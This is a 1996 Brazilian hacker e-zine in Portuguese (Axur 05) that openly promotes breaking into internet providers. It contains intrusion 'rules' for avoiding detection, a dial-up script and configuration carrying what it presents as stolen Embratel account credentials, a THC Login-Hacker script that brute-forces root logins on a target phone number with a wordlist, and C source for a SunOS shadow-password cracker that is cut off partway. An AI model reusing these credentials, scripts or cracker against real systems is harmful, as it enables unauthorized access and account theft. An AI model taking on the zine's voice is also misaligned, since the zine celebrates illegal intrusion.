-aa                                                         
	-a-a   -x   -x -u   -u  -r -rr      -000  -55555                 
	-a -a   -x -x  -u   -u  -r-r      -0    -0-5                      
	-a a-a    -x   -u   -u  -rr       -0    -0-5555                     
	-a   -a  -x -x -u   -u  -r        -0    -0    -5                
	-a    -a-x   -x -uuu uu -r          -000  -5555                       
								     
     -- = = [AXUR 05 - DARK SIDE HACKERS - BRAZIL] = = --
	     ~~~~ ~~ ~ ~~~~ ~~~~ ~~~~~~~   ~~~~~~
  




Axur 05 - revista mensal ( todos dia 01 na BBS mais prВўxima).




Hackerland, 30 de Dezembro de 1996
Revista n§ - 0.80 ( ver. beta final) 


Sem mestres, sem lamahs, sem deuses... somente no's e nossas ma'quinas.
Pra salvar a honra dos Brasileiros! yO outside *fuck you* 
			
}-===============================[chain]===============================-{                        


               Itz time to face the music bud...                                                                                                                                                                                                                         
                                                    -  GOD


               Simple... but really a pretty penny!    
                                                    - SATAN
     INDICE:

     1-) OFFERTORIUM
     2-) QUAL NOSSO OBJETIVO COM ESSE ZINE UNDERGROUND?
     3-) EXISTE UMA ETICA SIM!
     4-) COMECANDO A COMECAR...
     5-) TECNICAS TELEFONICAS USADAS
     6-) HUMM... UM SENHA DA EMBRATEL
     7-) HACK SCRIPT PARA O LOGIN HACK/THC
     8-) MEU PROPRIO DESENCRIPTADOR DE SENHAS...
     9-) ANARCHY - by HaphazarD
    10-) Cartas: ( como entrar em contato).
     *-) EXTRA BONUS - Senhas da KANOPUS e da NETVILLE
		      
}-===============================[chain]===============================-{




1-) OFFERTORIUM...
    ~~~~~~~~~~~~~~

Bom, pra comeco de conversa escrever esse fatВЎdico zine esta sendo dificil,
esperamos  inicialmente uma colaboracao da parte de voces para que realmen-
te possamos comecar a nos divertir.
Textos escritos por  AciDmuD, VooDoo, HaphazarD e ???????...  todos cidadoes
conscientes  do  mal que estao fazendo a sociedade e pouco se importanto com 
o uso que os jovens inconsequentes farao do conteudo deste ou de outras das 
nossas publicacoes.
Garanto que depois que sair o numero um vai aparecer um monte de bostinha fa-
lando "Eles nao sao hackers, pois nao seguem a ETICA HACKER".... meus ami-
gos, quem faz a ETICA e' voce proprio! Se nos quisermos sair por ai detonan-
do problema e' nosso. Ja vou avisando, nao gostou - NAO LEIA.
Essa revista e' pra voce que como no's nao tem medo de desafios.
Copia  restrita,  liberada apenas  para BBS cadastradas. Liberado o escambo 
por   meio   de correio eletronico.  Qualquer  publicacao indevida do texto 
abaixo devera conter de onde foi tirado e tal...


}-===============================[chain]===============================-{                        





2-) QUAL NOSSO OBJETIVO COM ESSE ZINE UNDERGROUND?
    ~~~~ ~~~~~ ~~~~~~~~ ~~~ ~~~~ ~~~~ ~~~~~~~~~~~


Desmistificar  que  nao existe hacker  no  Brasil e chutar  a  bunda  dos 
prepotetes donos de provedores que exploram seus associados ate as tripas.
Todos  sabemos  que a nossa raca esta em extincao, nao nos colocamos como 
hacker e sim como pessoas comuns que detem um conhecimento um pouco acima 
do normal  e  por esse motivo tem quase que a obrigacao de passa-los para 
nao  levar  consigo para a terra dos pes juntos exterminando assim com um 
referencial de quem procura um aprimoramento em hack, phreack...( somente 
para  quem  esta disposto `a aprender  ), pois e' um saco ver um bando de 
garotos  metidos  que gostam apenas de apreender o truque  em  si e nao a 
te'cnica que foi usada e o metodo que esta sendo desenvolvido.  Programa-
dores  sejam bem vindos... teremos prazer em divulgar fontes de programas 
( pelo menos uma por edicao )especialmente desenvolvidos para finalidades 
ilegais. Sera bom para quem estuda programacao porque nos cortamos a  ba-
lela de falar, falar, falar... queremos acao!
Nao temos nada contra a revista BARATA ELETRICA, mas entre no's o negocio
e'muito fraco e sugere a proliferacao desenfreada de "burrinhos" como di-
ria nosso amigo Derneval. 
Espero  que  os assuntos discutidos interessem a todos e os facam crescer 
ao  nivel  lah de fora,  levando em conta  que tomamos uma baita surra se 
formos tentar nos comparar a eles.
 Lembrando: " Hacker nao  e' aquele que faz flood em um canal do IRC, nem 
aquele que manda mail bomb e muito menos aquele que cria virus com kitzi-
nho e sai ai phudendo com os amigos", hacker e' aquele que ama seu compu-
tador a ponto de transformar um XT inerte em um instrumento de desencrip-
tacao  ou  que conheca  o terreno onde pisa, conheca TCP/IP como soh ele, 
saiba  todos  os comandos do UNIX e seus parametros na ponta da lingua ou 
ainda esteja em contato pleno as novidades do seu mundo.
" Nos so seremos livres o dia em que o ultimo dono de provedor for enfor-
cado nas tripas do ultimo lamer." Li isso em algum lugar... e gostei! ;)

AVISO----------------------
Lamahs deletem-me do seu HD. \del axur0500.txt

}-===============================[chain]===============================-{                        


3-) EXISTEM REGRAS SIM
    ~~~~~~~ ~~~~~~ ~~~


Ja disse, so estamos escrevendo esse monte de coisa por ser nosso primei-
ro numero. Mas eГЇ bom resaltar alguns aspectos para que nao haja besteira 
no  inicio, detonar "SIM" mas na medida do necessario e de forma que voce 
novato nao seja pego.
Sigam alguns mandamentos listados abaixo e o resto e' besteira.

 1- Descobriu algo novo, OLHE 
 2- NAO APAGUE, pense no que seria melhor; ter acesso a um provedor ou 
    detona-lo?
 3- NAO MODIFIQUE NADA, ao menos que queira que saibam que esteve lah.
 4- Nunca tente um su root direto! Isso fica logado ;-)
 5- Nao fique dando telnet ou pegando mail usando acesso dos outros!
 6- Nunca substime um sysop
 7- Escolha horas entre 24:30 as 6:00
 8- Uma vez lah dentro tente dominar o lugar, e' claro, com cautela.
 9- Nao confie em ninguem. ( salve seu cachorro ou sua planta).
10- Se pegar a senha do root de algum provedor e nao souber o que fazer
    MATE-SE
11- Nao teste virus no seu proprio HD.
12- E' bom preparar muito bem uma estrateГЇgia antes de atacar.
13- Use os computadores de sua universidade ( e' mais seguro).
14- Nao fique distribuindo informacoes para ninguem ou dados sobre o que
    vc pegou.
15- NAO OBEDECA REGRAS. Claro que estas tem que ser cumpridas.
16- Nao tenha pena de ninguem.
17- Vc usa o MS-DOze ou o Windoze? Nao conte pra ninguem...
18- Vc usa o algum UNIX ou LINUX? Esteja certo que esta bem seguro...
19- Nao crie lacos afetivos com a vitima.
20- Aprenda o maximo que puder com quem sabe mais! Nao se meta a besta  
    direto
ULTIMO: Nao se submeta a nenhum sistema hierarquico. Administradores phe-
	dem.


}-===============================[chain]===============================-{                        



4-) COMECANDO A COMECAR
    ~~~~~~~~~ ~ ~~~~~~~

Nao adianta chorar boneca! Se quiser comecar a fazer alguma coisa delete 
de seu HD o windows ou o ms-dos... rode algo mais poderoso.
Perg: "Papai... nao sei nada de UNIX como vou operar o melhor sistem mul-
tiusuario do mundo? "
Resposta: Vamos tentar colocar uma lista auto-explicativa de todos os co-
mandos  do  UNIX, tendo  em vista que alguns comandos mudam dependendo do 
UNIX.
Imagino  que  voces saibam pelo menos do que estamos falando e tenham uma 
base disso. Nao tem misterio, mas so nao dah e' pra ficar parado.
Vamos comecar bombardiando voces com comandos do UNIX, como existem vari-
os tipos  de UNIX ( HP-UX, AIX, SCO etc...) alguns comando diferem depen-
dendo do seu sistema operacional, a medida do possivel vamos tentar colo-
car os respectivos para cada sistema.
Sendo  que essa nao sera a ultima vez que abordaremos os comandos basicos 
e  avancados  do unix, pretendemos colocar  voces bem por dentro antes de 
sair por ai falando besteira.
Se  voce  esta atras de conhecimento mesmo acho que essa lista de comando 
ira lhe dar uma pequena base. Nao pense que somente com isso voce podera 
sair dizendo que ja sabe operar um sis. unix.
Seja humilde e leia, vamos lah! Temos que comecar por ai mesmo, nas  pro-
ximas edicoes da revistas AXUR 05 vamos colocar mais e mais dicas sobre o 
nosso rapaz.

Lista de comandos compilada por AciDmuD - (c)1996 - Global Domination Inc.


COMANDO                 DESCRICAO
~~~~~~~                 ~~~~~~~~~

as                      Esse  e' o montador usado  para montar fontes  em
			linguagem asm. Pra ter uma melhor definicao e'me-
			lhor consultar o guia do System V.
			Opcao -o: nome que ouser quer dar ao arquivo .obj
			criado. Se nao usar o nome do arquivo vai sair co-
			mo o mesmo nome mas com o sufixo .o.
			Opcao -R: apaga o arquivo de entrada apos termino
			da montagem.
			Opcao -V: a versao do montador e' incluida na sai-
			da gravada na saida de erro.

awk                     O  filtro AWK e'um programa de analise de padroes 
			que le arquivos linha por linha. As as instrucoes 
			do comando AWK sao na verdade um poderosa lingua-
			gem de programacao.
			Seu formato geral e':
			awk `programa` nome(s)_de_arquivo(s)
										   
banner                  Programa usado pra fazer letras gigantes Os cara-
			cteres de entrada sao ecoados na saida padrao com 
			letras gigantes. Pode ser usar no MAXIMO 10 cara-
			cteres e nao e' recomendado usar espaco pois esses
			serao usados como delimitadores de partes que apa-
			recem em partes separadas. Tente:
			
			banner Eu to aprendendo
			
			Pode direcionar para um arquivo:
			banner Eu to aprendo > legal.sim

bdiff                   Compara dois arquivos grandes.

bfs                     Procura um arquivo grande.

cal                     Mostra o calendario.

cat                     Concatena e imprine arquivos.

cb                      Embelezador de C. Muito util para desenvolvedores 
			de programas em UNIX.
			cb -s velhofonte.c > novofonte.c
		    
cc                      Esse e'o comando usado para chamar o compilador C 
			do sistema unix. O formato geral e'o seguinte:
			
			cc opcao(oes) arquivo(s)
			
			As principais opcoes sao:
			-c:  cria  um arquivo .o que vai conter dados  da 
			fase de ligacao e edicao do processo. Normalmente
			o arquivo .o e' apagado durante o processo.

cd                      Muda diretorio ( igual MS-DOS).

chgrp                   Muda o dono de um arquivo. Esse comando  e' phoda
			de explicar. Mas vamos tentar.
			Quando um arquivo e' criado sao lhe atribuidos va-
			lores de propriedade, os valores sao atribuidos de 
			acordo  com os valores umask do dono no momento da 
			criacao do arquivo.
			Voce pode ser dono, grupo ou user.
			Comando usado e':
			
			chgrp novo_grupo nome_do_arquivo

chmod                   Comando usado para mudar permissoes de arquivos
			Existe tres tipos de permissoes:
			r -  read         valor=  1
			w -  write        valor=  2
			x -  execute      valor=  4
			Os arquivos listados ecoam da seguinte forma:

			3 -r-xr-xr-x 1 uucp sys 1309 Jan 3 1986 Uutry

			Temos assim que olhar no rwx r-x r-x
						  |   |   |
						  |   |   |
						 dono |   |
						    grupo | 
							outros
			No  caso o usuario tem r-x que na tabela de valo-
			res corresponde a 5
			Podemos trocar uma permissao entao assim:

			chmod 005 nome_do_arquivo

			Ai o arquivo ficaria assim:

			3 -------r-x 1 uucp sys 1309 Jan 3 1986 Uutry
			Ou poderia faze-lo assim:

			chmod a+rw nome_do_arquivo

			O caracter "a" antes do +rw significa "todos os 
			grupos".
			O sinal + e - sao para atribuir e retirar respec-
			tivamente.

chown                   Comando usado para passar a propriedade de um pa-
			ra outra pessoa. O formato geral do comando e':

			chown novo_dono nome_do_arquivo

cmp                     Compara dois arquivos e mostra localizacao linha 
			e byte desde a primeira diferenca.
			Caso  do conteudo ser identico e nao imprimi nada 
			na tela.
			Tem duas opcoes -l pra lista longa e -s para lis-
			ta curta.


comm                    Compara  dois  arquivos e determina qual linha e'
			comum para os dois

cp                      Copia um arquivo para outra localizacao.
			Muito usado para duplicar arquivos. Formato geral:

			cp arquivo1 arquivo2

			Sendo que o arquivo1 eВґ o arquivo de entrada, e o
			arquivo2  o  arquivo de saida, este pode ser dire-
			cionado para qualquer localizacao.
			CUIDADO: Esse comando  nao  pede confirmacao, logo
			tenha certeza do que esta fazendo, caso contrario 
			podera modificar o conteudo do seus arquivos.

cpio                    E' um comando muito importante do UNIX e tb muito 
			util geralmente usado para copias de seguranca. 
			Ele faz a copia de entrada e saida, eВґ particular-
			mente  poderoso  quando  combinado com o comando 
			'find' e o comando 'ls' em um instrucao composta. 
			Ele  tem  tres modos basicos que sao determinados 
			pelas opcoes -o, -i e -p. A opcao -o indica que o 
			comando  cpio  deve criar  um arquivo especial de 
			saida que sera lido pelo comando -i.
			O arquivo de saida criado usando a opcao -o e' um 
			arquivo sequencial  e pode ser manipulado por ou-
			tros comandos, como o pack e o unpack.
			Podemos usar um enlace de comunicacao por meio do 
			arquivo de transmissao do uucp. Podemos ate copi-
			ar algo de um sistema unix para uma rede local.
			Voce  deve  criar o arquivo  de transmissao com o 
			cpio e transmitir com o uucp.
			Vamos criar o arquivo de transmissao:

			find /usr/tsm - print | cpio -ocv > arqtransm
 
			No caso o arquivo find comeca no diretorio 
			/usr/tsm e imprime os nomes dos arquivos na saida 
			padrao  pegando todos os subdiretorios que se en-
			contram desse nivel em diante.
			A  opcao -ocv  significa que o cpio deve criar um 
			arquivo de saida (o) onde as informacoes do cabe-
			calho  deve ser gravadas em ASCII, para assegurar 
			portabilidade (c), e que a medida que cada arqui-
			vo  for  processado, seu nome deve ser exibido na 
			tela.
			Uma vez tendo o arquivo de saida arqtransm podemos 
			envia-lo  pelo comando uucp. Uma pratica comum e' 
			compactar os arquivos para que a transmissao suce-
			da de um  modo mais rapido  e com menas quantidade 
			de dados. Pode compactar com o pack e descompactar 
			com o unpack, mais tarde explicarei isso.
			Antes  de  executar o cpio seria necessario tornar 
			corrente  o diretorio /usr/wbu. Usando o nome arq-
			transm de nosso exemplo anterior, a seguinte linha 
			de comando seria entao usada para le-lo e restaurar 
			os arquivos e diretorios que contem:

			cpio -icduvm < /usr/spool/uucppub/arqtransm
	      
			As opcoes (-icduvm) podem aparecer em qualquer or-
			dem, essa ordem eВґ a convencionada. Com a opcao -i 
			primeiro da pra observar qual operacao o cpio esta 
			usando. A opcao -d indica os que os diretorios nao 
			existentes  no  destino devem ser criados; a opcao 
			-u  indica que todos os arquivos do arquivo de en-
			trada devem ser restaurados, substituindo eventuais 
			arquivos com mesmo nome no diretorio de destino.
			A acao  de  restauracao tomada pela opcao -u nao e' 
			especificada a manter o nome do arquivo mais  novo 
			dos dois; isso e' determinada pelo registro de da-
			ta e hora presente no inodo do arquivo.
			O operador de redirecionamento indica onde esta lo-
			calizado o arquivo de entrada do cpio,  nesse caso 
			o percurso absoluto /usr/spool/uucppublic/arqtransm.
			O diretorio /usr/spool/uucppublic e' aberto para 
			ser acessado por todos e eВґ onde o uucp coloca da-
			dos sem se preocupar com as permissoes de acesso 
			do arquivo.
			O modo -p (passe) permite copia em massa, executando 
			o  processamento  de entrada e de saida em uma unica 
			operacao:

			find /usr/tsm -print | cpio -pduvm /usr/wbu

			Esse  comando primeiro executa o find para criar 
			uma lista dos arquivos e diretorios que serao usa-
			dos como entrada do cpio.
			A saida sera colocada no diretorio chamado /usr/wbu.
			Nesse exemplo, todos os arquivos com nomes identi-
			cos  ja  existentes no diretorio de destino  serao 
			substituidos pois a opcao -u foi usada.

cu                      E' o comando que chama UNIX (call UNIX) estabele-
			ce uma sessao com outro sistema remoto.
		
cut                     Comando usado para extrair informacoes seleciona-
			das de um arquivo  de  entrada. Opcao -d eВґ usada 
			para  espefificar  o caracter delimitador, se nao 
			colocar nada ele pega como padrao um unico espaco 
			em branco. Opcao  -f e' usada para indicar  quais 
			campos serao recortados.
			Tipo assim, para  listar todas as IDs de usuarios 
			e seus nomes, o seguinte comando poderia ser usado:
 
			cat /etc/passwd | cut -d":" -f1,5       
				       
	
date                    Exibe a data do sistema:
			Dia Mes dd hh:mm:ss TZ ( time zone) aaaa
			Esse comando nao e' muito interessante para en-
			trarmos em detalhes.


df                      Mostra o espaco livre no file system.


diff                    Mostra na tela diferencas entre dois arquivos
			ou diretorios.


diff3                   Mostra na tela diferencas entre tres arquivos ou 
			diretorios.


du                      Reports de um file sistem usado.


echo                    Mostra na tela um argumento.


ed                      Editor de texto padrao distribuido com a maioria 
			dos sistemas UNIX. Nao e' tao rico como os edito-
			res de texto do padrao MS-DOS.
			Mas  o  negocio ta mudando rapidamente, pode  ser 
			alternado com o vi.


egrep                   Da familia dos comandos grep de busca de padroes.
			Ele geralmente aceita expressoes regulares que o 
			grep nao aceita.
			Pode ser:

			egrep Rudi+ /etc/passwd

			Vai listar todas as entradas no arquivo que possu-
			irem o nome Rudi.
			Outra forma de fazer isso  eВґ usando a saida ecoada:
 
			cat/etc/passwd | egrep Rudi+

			Essa forma eВґ mais lenta pq primeiro copia o arqui-
			vo e depois filtra.                         


fgrep                   E' o grep rapido. Por nao usar tempo nenhum na a-
			valiacao das expressoes como ocorre no comando e-
			grep. So aceita cadeias como padrao de busca. 

f77                     Compilador FORTRAN.

find                    Localiza um arquivo com caracteristicas especi-
			ficadas


--------------------- O RESTO DA LISTA NA PROXIMA EDICAO -----------------


Comecem com isso, acho que jogar tantos comandos de uma vez so nao e' legal
portanto, na proxima AXUR 05 vamos colocar o resto dos comandos.
Nosso objetivo e' criar a maior lista compilada em um arquivo ate hoje de 
comandos de UNIX em portugues.
Tomara que o nosso trabalho valha a pena! ;)


}-===============================[chain]===============================-{                        

6-) HUMM... UMA SENHA DA EMBRATEL
    ~~~~~~~ ~~~ ~~~~~ ~~ ~~~~~~~~


Esse script deve ser usado com o Trumpet Winsock.
O script em si e' uma fonte que eu usei de um provedor gaucho, usei ele 
porque ele e' muito bem feito e facilitou o trabalho.
O provedor o qual nao citarei o nome nao tem nada a ver com nossas en-
crencas, falo isso pq conheco o pessoal de lah e eles sao realmente ba-
canas. ;)

P: De quem e' essa conta?
R: De um escola de computacao filha da puta de Canoas-RS.

P: Qual o crime que eles cometeram?
R: Cursos caros com baixa qualidade...formando assim mais "burrinhos"

P: Isso nao e' arriscado demais?
R: Bom... atravesar a rua hoje em dia e' arriscado.

P: EU PAGO ALGUMA COISA?
R: O acesso e' FREE, mas a taxa telefonica e' por sua responsabilidade.

Pode distribuir esse script para quem voce quiser, mas nao esqueca de
deixar o nome do autor ;)



#corte aqui------------------login.cmd--------------------------------

#ACID-HACK-ACID-HACK-ACID-HACK-ACID-HACK-ACID-HACK-ACID-HACK-ACID-HAC#
#                                                                    #
#                           AciD HackNet                             #
#                    (c)Reg. AciDmuD 10/08/96                        #
#                   - acidmud@thepentagon.com -                      #                              
#                                                                    #
######################################################################
#                                                                    #
# Desculpa a desorganizacao dos codigos do script ta meio            #
# improvisado! Mas funciona mesmo.                                   #
#                                                                    #
#ACID-HACK-ACID-HACK-ACID-HACK-ACID-HACK-ACID-HACK-ACID-HACK-ACID-HAC#


%tentativas = 16

$inicmodem = "AT&C1E1X4"
# O comando AT e normal, ja o X3 despresa o sinal de ocupado
# eu uso no meu modem por causa da central. Mas nao faz mal.
# Se quiser tirar pode tirar...
# O 0, serve para chamar linha no caso de central telefonica.

$dialstr = "ATX3DP0,"

load $password
$numero = "0900992880"
$numero2 = "0900991440"
load $password
if [password "Nao precisa colocar nada, so pressione enter:"]

  save $password
end

load $username
if [username "Nao precisa colocar nada, so pressione enter:"]

  save $password
end

output "ATZ"\13


if ! [input 10 OK\n]

  display \n"Modem nao responde."\n
  display \n"Verifique sua configuracao."\n
  abort

end
output $inicmodem\13
input 10 OK\n

display "Inicio da discagem." %tentativas "tentativas, caso ocupado."\n

%n = 0
%ok = 0

repeat

  %timeout = 1

  while %timeout

    %timeout = [read 2 $branco]

  end

  if %n = %tentativas

display \n"Ocupado mesmo apos" %tentativas "tentativas"\n

output +++

    output ATH0\r

    abort

  end

  %n = %n + 1

  display \n"yO!. Hacking.... (tentativa" %n")..."\n

  outputecho $dialstr $numero\13

if $numero = $numero1

$numero = $numero2

else
 
if $numero = $numero2
 
$numero = $numero1
 
end

end

 $result = ""

 $result2 = ""

 while $result = ""

   %timeout = [read 80 $result]

   if !%timeout

     $result = "MODEM NAO RESPONDE"

   end

 end

 $result2 = copy($result,1,7)

until $result2 = "CARRIER" | $result2 = "CONNECT" | $result2 = "PROTOCO"

%timeout = 1

%timeout = [wait 15 dcd]

if !%timeout

  display \n"Seu modem nao esta bem configurado." \n

  display \n"Verifique a configuracao do seu modem."\n

end

input 30 name:
output $username\13
input 30 word:
output \p\13
input 30 >

    output ppp default\13
    address 30
    input 30 \n

display \n
						       
display "Yo! Tudo deu certo... voce ja esta conectado!."\n
display \n"(c)Reg. by AciDmuD - acidmud@thepentagon.com."\n

#corte aqui-----------------login.cmd--------------------------------


Agora voce deve renomear seu arquivo trumpwsk.ini para trumpwsk.old
e criar um novo arquivo trumpsk.ini com o conteudo abaixo

#corte aqui------------------trumpwsk.ini-----------------------------


[Trumpet Winsock]
ip=200.255.255.89
netmask=0.0.0.0
gateway=0.0.0.0
dns=200.255.253.241
time=200.255.253.241
domain=embratel.net.br
vector=60
mtu=296
rwin=1024
mss=256
rtomax=60
ip-buffers=32
slip-enabled=1
slip-port=2
slip-baudrate=28800
slip-handshake=1
slip-compressed=1
dial-option=0
online-check=1
inactivity-timeout=5
slip-timeout=0
slip-redial=0
dial-parity=0
font=Courier,9
registration-name=""
registration-password="h[G?"Rgl"
use-socks=0
socks-host=0.0.0.0
socks-port=1080
socks-id=
socks-local1=0.0.0.0 0.0.0.0
socks-local2=0.0.0.0 0.0.0.0
socks-local3=0.0.0.0 0.0.0.0
socks-local4=0.0.0.0 0.0.0.0
ppp-enabled=1
ppp-usepap=0
ppp-username=""
ppp-password=""
win-posn=88 88 636 408 21 408 -4 -4 3
trace-options=0

[default vars]
$username=sispro
$password=;/"tkWi

#corte aqui------------------trumpwsk.ini-----------------------------



}-===============================[chain]===============================-{                        




7-) LOGIN HACK PARA O HACK LOGIN/THC
    ~~~~~ ~~~~ ~~~~ ~ ~~~~ ~~~~~~~~~

A muito tempo o pessoal tava perguntando, onde eu posso pegar um programa
que tente logar alguma coisa usando como base de tentativas um .dic...
Bom. O melhor que eu conheco e' o LOGINH.ZIP da THC que recebi da L.o.r.E
uma das melhores BBSz da Europa, mas e como usar sendo o padrao telefoni-
co brasileiro diferente. Voces nao vao encontrar problema nao, basta fazer
direitinho.
Primeiro lugar  voces vao ter que ir atras do loginh.zip, o arquivo esta
por ai. Nao adianta nos mandar mail que nao vamos mandar ele para ninguem.
Nao por nao querer e sim pq se formos atender a todos nos estamos fudidos.
Depois de pegar o dito cujo voces devem configurar o programa, coisa mui-
to facil e' quase que automatico.
Agora voces vao ter que catar o programa LH-COMP.EXE que tambem e' da THC
sendo que esse vai compilar o script hacker para ser usado com o LOGINH.
Quando eu peguei o LOGINH, no pacote esse programa veio junto.

Como compilar o script DEC-SERV.LHK
-----------------------------------

Facilimo! Recorte onde esta indicando e crie um arquivo chamado de
DEC-SERV.LHK onde voce deve colar o conteudo aqui asinalado.
Nao se esqueca de mudar a fonte desse arquivo e colocar numero do tele-
fone e outros dados necessarios para funcionar.
Depois escreva no prompt:

lh-comp dec-serv.lhk

Voce vai notar que vai aparecer no seu diretorio o arquivo DEC-SERV.SCR
este e'o script em si, ja compilado.
* Com o passar do tempo se a revista for um sucesso ( o que vai depender 
de voce ) nos vamos criar um FTP com os programas que citamos.
Coloque esse arquivo DE-SERV.SCR no mesmo diretorio que o LOGINH.EXE
Execute o LOGINH.EXE e carregue o arquivo.
Ate crianca consegue fazer isso...
Se nao conseguir voce nao merece faze-lo mesmo! ];)
NOTA: Voce pode modificar a fonte, mas nao mude o nome do autor.
Caso voce crie um script bom, mande que nos publicamos. 

;corte aqui-------------------DEC-SERV.LHK-----------------------------
;
;
; ----------------------------------------------------------------------
;  Dec-Telnet-Platform  Script  for THC-Login-Hacker v0.9ГЎ  (by Tron X)
;  Global Domination Inc. - by VooDoo and AciDmuD -Brazil- 1996
; ----------------------------------------------------------------------
;  *Fonte do script original modificada para atender aos padroes
;   brasileiro. - acidmud@thepentagon.com - 
; ----------------------------------------------------------------------
;   Tudo que aparecer com o sinal ";" na frente e' comentario ou instru-
;   cao.
;
;
#DEFINE
; Abaixo inicializacao do modem ( Default AT Z)
init_modem=at z
; 8 bits sem paridade
init_data=8n1
; Abaixo arquivo onde ficarao logados os comentarios.
LOGFILE=c:\output\hacklog.log
; Telefone alvo
PHONE_NR=0,2228344
; Numero de discagens ( O 0 significa infinitas vezes.)
DIAL_TRIES=0
; Numero de vezes para tentar logar
LOGIN_TRIES=0
; Coloque abaixo o caminho onde se localiza sua wordlist. Se voce quiser
; pode ter mais que um caminho, tirando o sinal ";" da frente do dic(2).
DIC(1)=C:\hacking\diction.ary\vh_basic.dic
;dic(2)=c:\hacking\bigdict2.txt
;dic(3)=c:\hacking\bigdict3.txt

#NOCARRIER
LOG(NO CARRIER)
LOG(ON $DATE $TIME)
LOG(AT $DIC(1))
LOG(retornando ...)
GOTO(#START)

#START
HANGUP
LOG_SESSION_ON
LOG()
log(---------------------------------------------)
log( Brazil - (c)Reg. by AciDmuD and VooDoo)
log( Global Domination Inc. - 1996 -)
log() 
log( Iniciando processo .....)
log()
log(  ALVo: $PHONE_NR )
log(    DATa: $DATE )
log(    HORa: $TIME)
log()
log()
log( ......DiSCANDO)    
dial
log()
log( ......CONECTADO!)
log()
log()
wait(5)
:1
wait4string(1,^M,5,goto(#start),sername>)
send(fh65)
:2
wait4string(1,^M,5,goto(#start),ocal>)
send(connect 189.25.56.7)
:3
if string~sconnected then goto(2)
if string~ncorrect then goto(3)
wait4string(1,^C,5,goto(4),ogin:)
send(root)
if string~sconnected then goto(2)
if string~ncorrect then goto(3)
:4
if string~sconnected then goto(2)
if string~ncorrect then goto(3)
wait4string(1,^D,5,goto(4),assword:)
send_next_dic(1)
if string~sconnected then goto(2)
if string~ncorrect then goto(3)
:5
if string~sconnected then goto(2)
if string~ncorrect then goto(3)
:6
wait(1)
if string~sconnected then goto(2)
if string~ncorrect then goto(3)
wait(1)
if string~sconnected then goto(2)
if string~ncorrect then goto(3)
wait(1)
if string~sconnected then goto(2)
if string~ncorrect then goto(3)
wait(1)
if string~sconnected then goto(2)
if string~ncorrect then goto(3)
wait(1)
if string~sconnected then goto(2)
if string~ncorrect then goto(3)
wait(1)
if string~sconnected then goto(2)
if string~ncorrect then goto(3)
wait(1)
if string~sconnected then goto(2)
if string~ncorrect then goto(3)
wait(1)
if string~sconnected then goto(2)
if string~ncorrect then goto(3)
wait(1)
if string~sconnected then goto(2)
if string~ncorrect then goto(3)
:7
beep
beep
beep
beep
beep
beep
beep
beep
beep
log()
log()
log()
Log(...... TENTATIVA DE HACK FOI BEM SUCEDIDA!!!!!!!!!!)
log()
log(  TELEFONE: $PHONE_NR   DATA: $DATE  HORA: $TIME)
log()
log()
log()
log(        ACCouNT: root)
log(       PaSSWoRD: DIC(1))
log()
log()
log()
#END

;corte aqui-------------------DEC-SERV.LHK-----------------------------


}-===============================[chain]===============================-{                        






8-) MEU PROPRIO DESENCRIPTADOR DE SENHAS...
    ~~~ ~~~~~~~ ~~~~~~~~~~~~~~ ~~ ~~~~~~~~~

Essa Г© a fonte de um desencriptador de senhas do arquivo shadow padrao 
SUNOS.
O desencriptador eВґum programa que apartir de uma wordlist e um arquivo 
com  as senhas encriptadas ( eВґ claro) recria o valor dos codigos dando 
assim o login com seu respectivo password.

Corte a linha abaixo e cole em um arquivo vazio, para isso use um editor 
de textos, logo apos compile ele.
Nao fomos nos que fizemos, devemos creditos a The Shining/UPi(UK Division)


---CORTE AQUI-----------------------------------------------------------

/* Program   : Shadow Crack
   Author    : (c)1996 The Shining/UPi (UK Division)
   Date      : Released 12/4/96
   Unix type : Somente para arquivos shadowed do sistema SUNOS */

#include 
#include 
#include 
#include 
#include 

#define WORDSIZE 20     /* Tamanho maximo da palavra */
#define OUTFILE "data"  /* Arquivo que armazena info. da conta crackeada */

void word_strat( void ), do_dict( void );
void add_nums( char * ), do_comment( char * );
void try_word( char * ), reverse_word( char * );
void find_mode( void ), burst_mode( void );
void mini_burst( void ), brute_force( void );
void user_info( void ), write_details( char * );
void pwfile_name( void ), disable_interrupts( void ), cleanup();


char *logname, *comment, *homedir, *shell, *dict, *mode,
     *pwfile, *pwdauth();
struct passwd *getpwnam(), *pwentry;
extern char *optarg;
int option, uid, gid;


int main( int argc, char **argv )
{
disable_interrupts();
system("clear");

if (argc < 2) {
printf("Shadow Crack - (c)1996 The Shining\n");
printf("SUNOS Shadow password brute force cracker\n\n");
printf("useage: %s -m[mode] -p[pwfile] -u[loginid] ", argv[0]);
printf("-d[dictfile]\n\n\n");
printf("[b] is burst mode, scans pwfile trying minimum\n");
printf("    password strategies on all i.d's\n\n");
printf("[i] is mini-burst mode, scans pwfile trying both\n");
printf("    userid, gecos info, and numbers to all i.d's\n\n");
printf("[f] is bruteforce mode, tries all above stategies\n");
printf("    as well as dictionary words\n\n");
printf("[pwfile]   Uses the password file [pwfile], default\n");
printf("           is /etc/passwd\n\n");
printf("[loginid]  Account you wish to crack, used with\n");
printf("           -mf bruteforce mode only\n\n");
printf("[dictfile] uses dictionary file [dictfile] to\n");
printf("           generate passwords when used with\n");
printf("           -mf bruteforce mode only\n\n");
exit(0);
}


/* Get options from the command line and store them in different
   variables */

while ((option = getopt(argc, argv, "m:p:u:d:")) != EOF)
 switch(option)
 {
   case 'm':
	   mode = optarg;
	   break;

   case 'p':
	   pwfile = optarg;
	   break;

   case 'u':
	   logname = optarg;
	   break;

   case 'd':
	   dict = optarg;
	   break;

   default:
	   printf("wrong options\n");
	   break;
 }

find_mode();
}


/* Routine to redirect interrupts */

void disable_interrupts( void )
{
signal(SIGHUP, SIG_IGN);
 signal(SIGTSTP, cleanup);
  signal(SIGINT, cleanup);
 signal(SIGQUIT, cleanup);
signal(SIGTERM, cleanup);
}


/* If CTRL-Z or CTRL-C is pressed, clean up & quit */

void cleanup( void )
{
FILE *fp;

if ((fp = fopen("gecos", "r")) != NULL)
   remove("gecos");

if ((fp = fopen("data", "r")) == NULL)
   printf("\nNo accounts cracked\n");

printf("Quitting\n");
exit(0);
}


/* Function to decide which mode is being used and call appropriate
   routine */

void find_mode( void )
{
 if (strcmp(mode, "b") == NULL)
    burst_mode();
 else
 if (strcmp(mode, "i") == NULL)
    mini_burst();
 else
 if (strcmp(mode, "f") == NULL)
    brute_force();
 else
  {
    printf("Sorry - No such mode\n");
    exit(0);
  }
}


/* Get a users information from the password file */

void user_info( void )
{
  uid = pwentry->pw_uid;
   gid = pwentry->pw_gid;
    comment = pwentry->pw_gecos;
